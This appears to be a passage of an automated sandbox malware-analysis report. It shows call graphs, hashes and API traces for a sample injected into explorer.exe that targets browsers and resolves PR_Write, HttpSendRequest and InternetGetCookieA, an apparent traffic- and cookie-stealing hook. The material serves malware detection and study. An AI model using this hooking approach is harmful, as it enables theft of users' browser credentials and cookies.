                            Function 004033CC Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: V]$w
                            • API String ID: 0-1809979649
                            • Opcode ID: 42bd21220bde98bb62acf642893d8dfca93f64c841701673fd305e1e43acfe1a
                            • Instruction ID: 61edb34967ce5c0d2b449a69cc50d59963c2f04a4cc5b601597bb2d822588311
                            • Opcode Fuzzy Hash: 42bd21220bde98bb62acf642893d8dfca93f64c841701673fd305e1e43acfe1a
                            • Instruction Fuzzy Hash: CC6100315192C19FC7238F358894595BFA4BF1371270906EBC480AF6E3D7386A56CB8A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00402693 Relevance: .1, Instructions: 134COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d1235fb553f314ef89bb8a52bd53efe18701fb1b95f888c05c5f14af6b28fe51
                            • Instruction ID: d44b925607d4b1b2a2c3506b06714fa95131db1e7c7f8c80e0743aa4ca335550
                            • Opcode Fuzzy Hash: d1235fb553f314ef89bb8a52bd53efe18701fb1b95f888c05c5f14af6b28fe51
                            • Instruction Fuzzy Hash: 6F3155F311AA867FF2228A84EC97DFB772CD6681297184481FD54DB503C218C8628FB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Function 0040A22A Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.406201450.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00409000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_409000_jdggfai.jbxd
                            Similarity
                            • API ID: __calloc_crt
                            • String ID:
                            • API String ID: 3494438863-0
                            • Opcode ID: 896673dff0cb852b6b85c5d98b72ec7be13585921852b5e73dc2f193fed4e683
                            • Instruction ID: dc71ed7466da9eb0705fe63e25281e957772f9b53f43e374e1b7511a8f985a56
                            • Opcode Fuzzy Hash: 896673dff0cb852b6b85c5d98b72ec7be13585921852b5e73dc2f193fed4e683
                            • Instruction Fuzzy Hash: EC2107B28083006AD7215B706C05B672794EB8133AF2906BFF950763D2EB7F8891865E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:9.9%
                            Dynamic/Decrypted Code Coverage:96.8%
                            Signature Coverage:8.3%
                            Total number of Nodes:314
                            Total number of Limit Nodes:9
                            execution_graph 1351 ce340c 1352 ce344d 1351->1352 1353 ce3415 1351->1353 1360 ce1274 VirtualQuery 1353->1360 1356 ce3421 RtlEnterCriticalSection 1362 ce31e5 1356->1362 1358 ce343e 1359 ce3445 RtlLeaveCriticalSection 1358->1359 1359->1352 1361 ce128b 1360->1361 1361->1352 1361->1356 1363 ce339b 1362->1363 1364 ce3200 1362->1364 1363->1358 1364->1363 1383 ce1000 GetProcessHeap RtlAllocateHeap 1364->1383 1366 ce3280 1384 ce1000 GetProcessHeap RtlAllocateHeap 1366->1384 1368 ce32c5 1369 ce32df lstrlen 1368->1369 1370 ce338b 1368->1370 1369->1370 1372 ce32f0 1369->1372 1371 ce1011 3 API calls 1370->1371 1373 ce3392 1371->1373 1385 ce1141 lstrlen lstrlen 1372->1385 1375 ce1011 3 API calls 1373->1375 1375->1363 1378 ce3313 1388 ce1000 GetProcessHeap RtlAllocateHeap 1378->1388 1380 ce3332 wsprintfA lstrcat 1389 ce1011 1380->1389 1383->1366 1384->1368 1386 ce1162 1385->1386 1386->1370 1387 ce1000 GetProcessHeap RtlAllocateHeap 1386->1387 1387->1378 1388->1380 1390 ce1274 VirtualQuery 1389->1390 1391 ce1019 1390->1391 1392 ce102d lstrcat lstrlen RtlMoveMemory 1391->1392 1393 ce101d GetProcessHeap HeapFree 1391->1393 1392->1370 1393->1392 1490 ce2ded 1491 ce2df6 1490->1491 1492 ce2e21 1491->1492 1494 ce27cd 1491->1494 1495 ce27e6 1494->1495 1500 ce2876 1494->1500 1496 ce1274 VirtualQuery 1495->1496 1495->1500 1497 ce27fc 1496->1497 1498 ce28a8 1497->1498 1499 ce28f3 1497->1499 1497->1500 1503 ce283e 1497->1503 1508 ce1000 GetProcessHeap RtlAllocateHeap 1498->1508 1504 ce2902 1499->1504 1509 ce1000 GetProcessHeap RtlAllocateHeap 1499->1509 1500->1492 1502 ce28bd memcpy 1502->1500 1507 ce2855 memcpy 1503->1507 1506 ce291c memcpy 1504->1506 1506->1500 1507->1500 1508->1502 1509->1506 1394 ce2ac9 1395 ce2afd 1394->1395 1438 ce2caa 1394->1438 1396 ce1141 2 API calls 1395->1396 1395->1438 1397 ce2b13 1396->1397 1397->1438 1441 ce1000 GetProcessHeap RtlAllocateHeap 1397->1441 1399 ce2b28 1442 ce1000 GetProcessHeap RtlAllocateHeap 1399->1442 1401 ce2b35 1443 ce1000 GetProcessHeap RtlAllocateHeap 1401->1443 1403 ce2b40 1444 ce104c VirtualAlloc 1403->1444 1405 ce2b4c 1445 ce29b4 1405->1445 1408 ce2b82 1410 ce29b4 3 API calls 1408->1410 1409 ce29b4 3 API calls 1411 ce2b75 1409->1411 1412 ce2b93 1410->1412 1411->1408 1413 ce2b7a lstrcat 1411->1413 1414 ce2b9c lstrcat 1412->1414 1415 ce2ba4 1412->1415 1413->1408 1414->1415 1416 ce29b4 3 API calls 1415->1416 1417 ce2bb4 1416->1417 1418 ce2bbd lstrcat 1417->1418 1419 ce2bc5 RtlZeroMemory 1417->1419 1418->1419 1420 ce29b4 3 API calls 1419->1420 1421 ce2be3 1420->1421 1422 ce2bea StrToIntA 1421->1422 1425 ce2bf9 1421->1425 1422->1425 1423 ce2c84 1465 ce105d VirtualFree 1423->1465 1425->1423 1454 ce104c VirtualAlloc 1425->1454 1426 ce2c91 1427 ce1011 3 API calls 1426->1427 1429 ce2c9a 1427->1429 1431 ce1011 3 API calls 1429->1431 1430 ce2c24 wnsprintfA 1455 ce2a02 1430->1455 1433 ce2ca3 1431->1433 1435 ce1011 3 API calls 1433->1435 1435->1438 1436 ce2c69 lstrcat 1436->1423 1439 ce2c79 1436->1439 1437 ce2c65 lstrcat 1437->1436 1439->1423 1440 ce2c80 lstrcat 1439->1440 1440->1423 1441->1399 1442->1401 1443->1403 1444->1405 1446 ce1141 2 API calls 1445->1446 1447 ce29be 1446->1447 1448 ce1141 2 API calls 1447->1448 1450 ce29fd 1447->1450 1449 ce29d1 1448->1449 1449->1450 1451 ce1141 2 API calls 1449->1451 1450->1408 1450->1409 1452 ce29e7 1451->1452 1452->1450 1453 ce29eb RtlMoveMemory 1452->1453 1453->1450 1454->1430 1456 ce2abc 1455->1456 1457 ce2a12 1455->1457 1456->1436 1456->1437 1457->1456 1458 ce1141 2 API calls 1457->1458 1460 ce2a33 1458->1460 1459 ce2ab0 lstrlen 1459->1456 1460->1456 1460->1459 1461 ce1141 2 API calls 1460->1461 1462 ce2aac 1460->1462 1463 ce2a64 RtlMoveMemory lstrcat 1460->1463 1461->1460 1462->1459 1464 ce1141 2 API calls 1463->1464 1464->1460 1465->1426 1510 ce2da9 1518 ce2d11 1510->1518 1512 ce2dba 1513 ce2de5 1512->1513 1514 ce2dc0 lstrlen 1512->1514 1515 ce27cd 6 API calls 1514->1515 1516 ce2ddc 1515->1516 1523 ce105d VirtualFree 1516->1523 1524 ce23a1 1518->1524 1522 ce2d28 1522->1512 1523->1513 1535 ce1000 GetProcessHeap RtlAllocateHeap 1524->1535 1526 ce23a9 1527 ce2538 1526->1527 1536 ce104c VirtualAlloc 1527->1536 1529 ce2788 1529->1522 1530 ce270a lstrcat lstrcat lstrcat lstrcat 1534 ce2551 1530->1534 1531 ce1011 GetProcessHeap HeapFree VirtualQuery 1531->1534 1532 ce249b GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree VirtualQuery 1532->1534 1533 ce2474 GetProcessHeap RtlAllocateHeap memcpy 1533->1534 1534->1529 1534->1530 1534->1531 1534->1532 1534->1533 1535->1526 1536->1534 1537 ce33a7 1538 ce33fa 1537->1538 1539 ce33bb 1537->1539 1540 ce1274 VirtualQuery 1539->1540 1541 ce33c2 1540->1541 1541->1538 1542 ce33c6 RtlEnterCriticalSection 1541->1542 1543 ce33dd 1542->1543 1546 ce33e2 1542->1546 1547 ce305d 1543->1547 1545 ce33f2 RtlLeaveCriticalSection 1545->1538 1546->1545 1548 ce1141 2 API calls 1547->1548 1549 ce3072 1548->1549 1550 ce3084 1549->1550 1551 ce1141 2 API calls 1549->1551 1567 ce31dc 1550->1567 1582 ce1000 GetProcessHeap RtlAllocateHeap 1550->1582 1551->1550 1553 ce3099 1583 ce1000 GetProcessHeap RtlAllocateHeap 1553->1583 1555 ce30a4 RtlZeroMemory 1584 ce2ff0 1555->1584 1558 ce30d1 StrToIntA 1559 ce31cb 1558->1559 1560 ce30eb 1558->1560 1561 ce1011 3 API calls 1559->1561 1562 ce2ff0 3 API calls 1560->1562 1563 ce31d3 1561->1563 1564 ce30fa 1562->1564 1565 ce1011 3 API calls 1563->1565 1564->1559 1566 ce3104 lstrlen 1564->1566 1565->1567 1568 ce2ff0 3 API calls 1566->1568 1567->1546 1569 ce3119 1568->1569 1570 ce1141 2 API calls 1569->1570 1571 ce3127 1570->1571 1571->1559 1596 ce1000 GetProcessHeap RtlAllocateHeap 1571->1596 1573 ce313e 1574 ce2ff0 3 API calls 1573->1574 1575 ce3157 wsprintfA 1574->1575 1597 ce1000 GetProcessHeap RtlAllocateHeap 1575->1597 1577 ce317f 1578 ce2ff0 3 API calls 1577->1578 1579 ce3190 lstrcat 1578->1579 1580 ce1011 3 API calls 1579->1580 1581 ce31a1 lstrcat lstrlen RtlMoveMemory 1580->1581 1581->1559 1582->1553 1583->1555 1585 ce2ffe 1584->1585 1586 ce3014 1584->1586 1587 ce1141 2 API calls 1585->1587 1588 ce1141 2 API calls 1586->1588 1593 ce300a 1587->1593 1589 ce3019 1588->1589 1590 ce3057 1589->1590 1591 ce1141 2 API calls 1589->1591 1590->1558 1590->1559 1591->1593 1592 ce1141 2 API calls 1594 ce3041 1592->1594 1593->1590 1593->1592 1594->1590 1595 ce3045 RtlMoveMemory 1594->1595 1595->1590 1596->1573 1597->1577 1598 ce34e4 RtlEnterCriticalSection 1599 ce3568 1598->1599 1600 ce3508 1598->1600 1601 ce3658 RtlLeaveCriticalSection 1599->1601 1602 ce1274 VirtualQuery 1599->1602 1600->1599 1600->1601 1605 ce1274 VirtualQuery 1600->1605 1603 ce3673 1601->1603 1604 ce3583 1602->1604 1604->1601 1607 ce3646 1604->1607 1608 ce3597 RtlZeroMemory 1604->1608 1606 ce351f 1605->1606 1606->1599 1609 ce1274 VirtualQuery 1606->1609 1607->1601 1610 ce2ff0 3 API calls 1608->1610 1612 ce352e 1609->1612 1611 ce35b6 1610->1611 1611->1601 1613 ce35c0 StrToIntA 1611->1613 1612->1599 1614 ce3532 lstrcat 1612->1614 1613->1601 1615 ce35d5 1613->1615 1616 ce305d 16 API calls 1614->1616 1617 ce1141 2 API calls 1615->1617 1618 ce3556 1616->1618 1619 ce35e3 1617->1619 1628 ce105d VirtualFree 1618->1628 1619->1601 1620 ce35f4 1619->1620 1621 ce3631 1619->1621 1623 ce3610 1620->1623 1629 ce105d VirtualFree 1620->1629 1624 ce305d 16 API calls 1621->1624 1630 ce104c VirtualAlloc 1623->1630 1624->1607 1627 ce3621 RtlMoveMemory 1627->1601 1628->1599 1629->1623 1630->1627 1631 ce1765 lstrlen 1632 ce17ac 1631->1632 1633 ce177d CryptBinaryToStringA 1631->1633 1633->1632 1634 ce1790 1633->1634 1637 ce1000 GetProcessHeap RtlAllocateHeap 1634->1637 1636 ce179b CryptBinaryToStringA 1636->1632 1637->1636 1638 ce293c 1639 ce2943 1638->1639 1646 ce29a2 1638->1646 1640 ce1274 VirtualQuery 1639->1640 1639->1646 1642 ce296d 1640->1642 1641 ce2980 1644 ce1274 VirtualQuery 1641->1644 1642->1641 1643 ce1011 3 API calls 1642->1643 1643->1641 1645 ce298f 1644->1645 1645->1646 1647 ce1011 3 API calls 1645->1647 1647->1646 1347 ce99b6 1349 ce99e8 1347->1349 1348 ce9b80 VirtualProtect VirtualProtect 1350 ce9b49 1348->1350 1349->1348 1349->1350 1648 ce2d37 1649 ce2d49 1648->1649 1650 ce2da1 1649->1650 1651 ce2d11 11 API calls 1649->1651 1652 ce2d64 1651->1652 1652->1650 1653 ce1141 2 API calls 1652->1653 1654 ce2d78 1653->1654 1655 ce2d7c lstrlen 1654->1655 1656 ce2d98 1654->1656 1658 ce27cd 6 API calls 1655->1658 1659 ce105d VirtualFree 1656->1659 1658->1656 1659->1650 1475 ce3454 1476 ce345d 1475->1476 1477 ce3495 1475->1477 1478 ce1274 VirtualQuery 1476->1478 1479 ce3465 1478->1479 1479->1477 1480 ce3469 RtlEnterCriticalSection 1479->1480 1481 ce31e5 13 API calls 1480->1481 1482 ce3486 1481->1482 1483 ce348d RtlLeaveCriticalSection 1482->1483 1483->1477 1484 ce9992 1485 ce99b4 1484->1485 1486 ce9a08 1484->1486 1487 ce9b80 VirtualProtect VirtualProtect 1486->1487 1489 ce9b49 1486->1489 1488 ce9bb4 1487->1488 1488->1488 1660 ce1c70 1661 ce1c86 lstrlen 1660->1661 1662 ce1c93 1660->1662 1661->1662 1671 ce1000 GetProcessHeap RtlAllocateHeap 1662->1671 1664 ce1c9b lstrcat 1665 ce1cd7 1664->1665 1666 ce1cd0 lstrcat 1664->1666 1672 ce1902 1665->1672 1666->1665 1669 ce1011 3 API calls 1670 ce1cfa 1669->1670 1671->1664 1706 ce18d4 1672->1706 1676 ce192f 1711 ce106c lstrlen MultiByteToWideChar 1676->1711 1678 ce193e 1712 ce17b5 RtlZeroMemory 1678->1712 1681 ce1990 RtlZeroMemory 1683 ce19c5 1681->1683 1682 ce1011 3 API calls 1684 ce1c65 1682->1684 1687 ce1c52 1683->1687 1689 ce19f3 1683->1689 1714 ce1845 1683->1714 1684->1669 1686 ce1c38 1686->1687 1688 ce1011 3 API calls 1686->1688 1687->1682 1688->1687 1689->1686 1723 ce1000 GetProcessHeap RtlAllocateHeap 1689->1723 1691 ce1ac3 wsprintfW 1692 ce1ae9 1691->1692 1696 ce1b56 1692->1696 1724 ce1000 GetProcessHeap RtlAllocateHeap 1692->1724 1694 ce1b23 wsprintfW 1694->1696 1695 ce1c15 1697 ce1011 3 API calls 1695->1697 1696->1695 1725 ce1000 GetProcessHeap RtlAllocateHeap 1696->1725 1699 ce1c29 1697->1699 1699->1686 1700 ce1011 3 API calls 1699->1700 1700->1686 1701 ce1c0e 1704 ce1011 3 API calls 1701->1704 1702 ce1ba1 1702->1701 1726 ce104c VirtualAlloc 1702->1726 1704->1695 1705 ce1bfb RtlMoveMemory 1705->1701 1707 ce18de 1706->1707 1708 ce18ea 1706->1708 1709 ce1141 2 API calls 1707->1709 1710 ce1000 GetProcessHeap RtlAllocateHeap 1708->1710 1709->1708 1710->1676 1711->1678 1713 ce17d7 1712->1713 1713->1681 1713->1687 1715 ce18b3 1714->1715 1717 ce1852 1714->1717 1715->1689 1716 ce1856 DnsQuery_W 1716->1717 1717->1715 1717->1716 1718 ce1895 DnsFree inet_ntoa 1717->1718 1718->1717 1719 ce18b5 1718->1719 1727 ce1000 GetProcessHeap RtlAllocateHeap 1719->1727 1721 ce18bf 1728 ce106c lstrlen MultiByteToWideChar 1721->1728 1723->1691 1724->1694 1725->1702 1726->1705 1727->1721 1728->1715

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_00CE27CD 71 Function_00CE1274 0->71 80 Function_00CE1000 0->80 1 Function_00CE8FCD 2 Function_00CE2CCB 3 Function_00CE2AC9 51 Function_00CE29B4 3->51 54 Function_00CE104C 3->54 58 Function_00CE1141 3->58 59 Function_00CE105D 3->59 79 Function_00CE2A02 3->79 3->80 82 Function_00CE1011 3->82 4 Function_00CE91C6 5 Function_00CE16C7 6 Function_00CE14D8 7 Function_00CE13D7 6->7 21 Function_00CE13FE 6->21 6->80 6->82 8 Function_00CE1DD7 91 Function_00CE1E3A 8->91 9 Function_00CE96D7 10 Function_00CE18D4 10->58 11 Function_00CE38D3 53 Function_00CE37B3 11->53 55 Function_00CE374B 11->55 68 Function_00CE367E 11->68 12 Function_00CE2DED 12->0 13 Function_00CE8FED 14 Function_00CE3BEA 14->11 34 Function_00CE1090 14->34 36 Function_00CE12AA 14->36 14->58 67 Function_00CE1261 14->67 14->71 77 Function_00CE1305 14->77 14->80 87 Function_00CE1320 14->87 90 Function_00CE213A 14->90 96 Function_00CE1235 14->96 15 Function_00CE23EA 16 Function_00CE38EA 16->5 16->11 26 Function_00CE118D 16->26 16->34 16->36 48 Function_00CE2EB9 16->48 16->58 60 Function_00CE1D5D 16->60 16->67 16->71 16->77 16->80 16->82 16->87 16->90 16->96 17 Function_00CE23EB 18 Function_00CE86EB 19 Function_00CE34E4 25 Function_00CE2FF0 19->25 19->54 19->58 19->59 61 Function_00CE305D 19->61 19->71 20 Function_00CE31E5 20->58 20->80 20->82 21->6 21->7 21->80 21->82 22 Function_00CE1DFA 22->91 23 Function_00CE24F7 24 Function_00CE53F5 25->58 27 Function_00CE4F87 28 Function_00CE8F87 29 Function_00CE9683 30 Function_00CE349C 30->20 30->71 31 Function_00CE249B 31->17 31->80 31->82 32 Function_00CE2798 33 Function_00CE9992 35 Function_00CE27AE 37 Function_00CE8AAB 38 Function_00CE8BA8 39 Function_00CE15A9 40 Function_00CE2DA9 40->0 40->59 83 Function_00CE2D11 40->83 41 Function_00CE33A7 41->61 41->71 42 Function_00CE92A7 43 Function_00CE8AA2 44 Function_00CE20A3 45 Function_00CE1FA1 46 Function_00CE23A1 46->80 47 Function_00CE15BE 47->39 47->47 47->80 47->82 49 Function_00CE99B6 50 Function_00CE3DB7 50->14 50->16 50->50 50->71 50->80 51->58 52 Function_00CE17B5 53->47 66 Function_00CE1363 53->66 53->80 53->82 55->6 55->66 55->80 55->82 56 Function_00CE1047 57 Function_00CE1845 63 Function_00CE106C 57->63 57->80 60->8 60->54 76 Function_00CE1D04 60->76 85 Function_00CE1D27 60->85 61->25 61->58 61->80 61->82 62 Function_00CE3454 62->20 62->71 64 Function_00CE1765 64->80 65 Function_00CE9265 88 Function_00CE133F 66->88 68->6 68->66 68->80 68->82 69 Function_00CE5078 70 Function_00CE9179 72 Function_00CE2474 72->80 73 Function_00CE1C70 78 Function_00CE1902 73->78 73->80 73->82 74 Function_00CE340C 74->20 74->71 75 Function_00CE5107 78->10 78->34 78->52 78->54 78->57 78->63 78->80 78->82 79->58 81 Function_00CE9518 82->71 83->46 92 Function_00CE2538 83->92 84 Function_00CE8B26 85->22 86 Function_00CE9327 89 Function_00CE293C 89->71 89->82 90->44 90->45 90->71 92->23 92->31 92->54 92->72 92->82 93 Function_00CE9438 94 Function_00CE2D37 94->0 94->58 94->59 94->83 95 Function_00CE9834

                            Executed Functions

                            Function 00CE38EA Relevance: 122.8, APIs: 46, Strings: 24, Instructions: 296libraryloaderstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 ce38ea-ce3966 call ce1000 GetModuleFileNameA call ce1000 GetCurrentProcessId wsprintfA call ce118d CreateMutexA GetLastError 7 ce396c-ce39c6 RtlInitializeCriticalSection PathFindFileNameA lstrcat call ce1000 Sleep lstrcmpi 0->7 8 ce3bcd-ce3c43 call ce1011 * 2 RtlExitUserThread call ce1000 * 2 wsprintfA call ce1235 0->8 13 ce39c8-ce39ed call ce16c7 GetModuleHandleA GetProcAddress 7->13 14 ce3a13-ce3a1d lstrcmpi 7->14 64 ce3c67 8->64 65 ce3c45-ce3c55 call ce1141 8->65 28 ce39ef-ce39fc GetModuleHandleA GetProcAddress 13->28 29 ce3a02-ce3a0e 13->29 16 ce3b1d-ce3b42 call ce16c7 GetModuleHandleA GetProcAddress 14->16 17 ce3a23-ce3a2d lstrcmpi 14->17 35 ce3b44-ce3b50 call ce1d5d 16->35 36 ce3b55-ce3b62 GetModuleHandleA GetProcAddress 16->36 17->16 21 ce3a33-ce3a49 lstrcmpi 17->21 24 ce3a4b-ce3a57 GetCommandLineA StrStrIA 21->24 25 ce3a70-ce3a7a lstrcmpi 21->25 24->25 31 ce3a59 24->31 32 ce3a7c-ce3a88 GetCommandLineA StrStrIA 25->32 33 ce3a91-ce3a9b lstrcmpi 25->33 28->29 37 ce3b11-ce3b18 call ce16c7 28->37 30 ce3b0c call ce1d5d 29->30 30->37 41 ce3a5e-ce3a6e GetModuleHandleA 31->41 32->33 43 ce3a8a-ce3a8f 32->43 44 ce3bcc 33->44 45 ce3aa1-ce3aad GetCommandLineA StrStrIA 33->45 35->36 39 ce3b64-ce3b70 call ce1d5d 36->39 40 ce3b75-ce3b82 GetModuleHandleA GetProcAddress 36->40 37->44 39->40 49 ce3b84-ce3b90 call ce1d5d 40->49 50 ce3b95-ce3bc7 call ce16c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 40->50 51 ce3ad7-ce3adb 41->51 43->41 44->8 45->44 52 ce3ab3-ce3ace GetModuleHandleA 45->52 49->50 50->44 51->44 58 ce3ae1-ce3af3 call ce16c7 call ce2eb9 51->58 57 ce3ad0-ce3ad5 GetModuleHandleA 52->57 52->58 57->51 58->37 73 ce3af5-ce3afe call ce1274 58->73 68 ce3c6d-ce3c7d CreateToolhelp32Snapshot 64->68 74 ce3c5c-ce3c62 call ce1261 65->74 75 ce3c57 call ce38d3 65->75 71 ce3da7-ce3db2 Sleep 68->71 72 ce3c83-ce3c97 Process32First 68->72 71->68 76 ce3d98-ce3d9a 72->76 73->37 86 ce3b00-ce3b0a 73->86 74->64 75->74 79 ce3c9c-ce3caa lstrcmpi 76->79 80 ce3da0-ce3da1 FindCloseChangeNotification 76->80 83 ce3cac-ce3cba lstrcmpi 79->83 84 ce3d00-ce3d0d call ce12aa 79->84 80->71 83->84 87 ce3cbc-ce3cca lstrcmpi 83->87 90 ce3d0f-ce3d18 call ce1305 84->90 91 ce3d8c-ce3d92 Process32Next 84->91 86->30 87->84 89 ce3ccc-ce3cda lstrcmpi 87->89 89->84 92 ce3cdc-ce3cea lstrcmpi 89->92 90->91 96 ce3d1a-ce3d21 call ce1320 90->96 91->76 92->84 94 ce3cec-ce3cfa lstrcmpi 92->94 94->84 94->91 96->91 99 ce3d23-ce3d30 call ce1274 96->99 99->91 102 ce3d32-ce3d87 lstrcmpi call ce1090 call ce213a call ce1090 99->102 102->91
                            APIs
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00CE390E
                            • GetCurrentProcessId.KERNEL32(00000001), ref: 00CE3923
                            • wsprintfA.USER32 ref: 00CE393E
                              • Part of subcall function 00CE118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00CE11A9
                              • Part of subcall function 00CE118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00CE11C1
                              • Part of subcall function 00CE118D: lstrlen.KERNEL32(?,00000000), ref: 00CE11C9
                              • Part of subcall function 00CE118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00CE11D4
                              • Part of subcall function 00CE118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00CE11EE
                              • Part of subcall function 00CE118D: wsprintfA.USER32 ref: 00CE1205
                              • Part of subcall function 00CE118D: CryptDestroyHash.ADVAPI32(?), ref: 00CE121E
                              • Part of subcall function 00CE118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00CE1228
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00CE3955
                            • GetLastError.KERNEL32 ref: 00CE395B
                            • RtlInitializeCriticalSection.NTDLL(00CE6030), ref: 00CE3979
                            • PathFindFileNameA.SHLWAPI(?), ref: 00CE3980
                            • lstrcat.KERNEL32(00CE5CD6,00000000), ref: 00CE3996
                            • Sleep.KERNEL32(000001F4), ref: 00CE39B0
                            • lstrcmpi.KERNEL32(00000000,firefox.exe), ref: 00CE39C2
                            • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 00CE39E0
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE39E9
                            • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 00CE39F5
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE39F8
                            • lstrcmpi.KERNEL32(00000000,iexplore.exe), ref: 00CE3A19
                            • lstrcmpi.KERNEL32(00000000,microsoftedgecp.exe), ref: 00CE3A29
                            • lstrcmpi.KERNEL32(00000000,msedge.exe), ref: 00CE3A39
                            • GetCommandLineA.KERNEL32(NetworkService), ref: 00CE3A50
                            • StrStrIA.SHLWAPI(00000000), ref: 00CE3A53
                            • lstrcmpi.KERNEL32(00000000,chrome.exe), ref: 00CE3A76
                            • GetCommandLineA.KERNEL32(NetworkService), ref: 00CE3A81
                            • StrStrIA.SHLWAPI(00000000), ref: 00CE3A84
                            • lstrcmpi.KERNEL32(00000000,opera.exe), ref: 00CE3A97
                            • GetCommandLineA.KERNEL32(NetworkService), ref: 00CE3AA6
                            • StrStrIA.SHLWAPI(00000000), ref: 00CE3AA9
                            • GetModuleHandleA.KERNEL32(opera.dll), ref: 00CE3AC8
                            • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00CE3AD5
                            • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00CE3A68
                              • Part of subcall function 00CE16C7: GetCurrentProcessId.KERNEL32 ref: 00CE16D9
                              • Part of subcall function 00CE16C7: GetCurrentThreadId.KERNEL32 ref: 00CE16E1
                              • Part of subcall function 00CE16C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00CE16F1
                              • Part of subcall function 00CE16C7: Thread32First.KERNEL32(00000000,0000001C), ref: 00CE16FF
                              • Part of subcall function 00CE16C7: CloseHandle.KERNEL32(00000000), ref: 00CE1758
                            • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00CE3B35
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3B3E
                            • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00CE3B5B
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3B5E
                            • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00CE3B7B
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3B7E
                            • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00CE3BA2
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3BA5
                            • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00CE3BB2
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3BB5
                            • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00CE3BC2
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3BC5
                            • RtlExitUserThread.NTDLL(00000000), ref: 00CE3BE1
                            • wsprintfA.USER32 ref: 00CE3C28
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE3C72
                            • Process32First.KERNEL32(00000000,?), ref: 00CE3C91
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CE3DA1
                            • Sleep.KERNELBASE(000003E8), ref: 00CE3DAC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: HandleModule$AddressProc$Cryptlstrcmpi$CreateHash$CommandCurrentLineProcesswsprintf$CloseContextFileFindFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateChangeCriticalDataDestroyErrorExitInitializeLastMutexNotificationParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                            • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_Write$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                            • API String ID: 2814379029-1874988219
                            • Opcode ID: 937c52bf60eea98b96f8aeaaeab61543be96b424ac626393303334f37f8e4795
                            • Instruction ID: 19c53b3af66261d2c608bafb102a47f7d3d93c55feb0973f4fe9e3d08db76551
                            • Opcode Fuzzy Hash: 937c52bf60eea98b96f8aeaaeab61543be96b424ac626393303334f37f8e4795
                            • Instruction Fuzzy Hash: CD91F471A403D167CA2877B39C8DF2F3A9D8F50B90F050534FA11AB2D1DB78EE019AA5
                            Uniqueness

                            Uniqueness Score: -1.00%

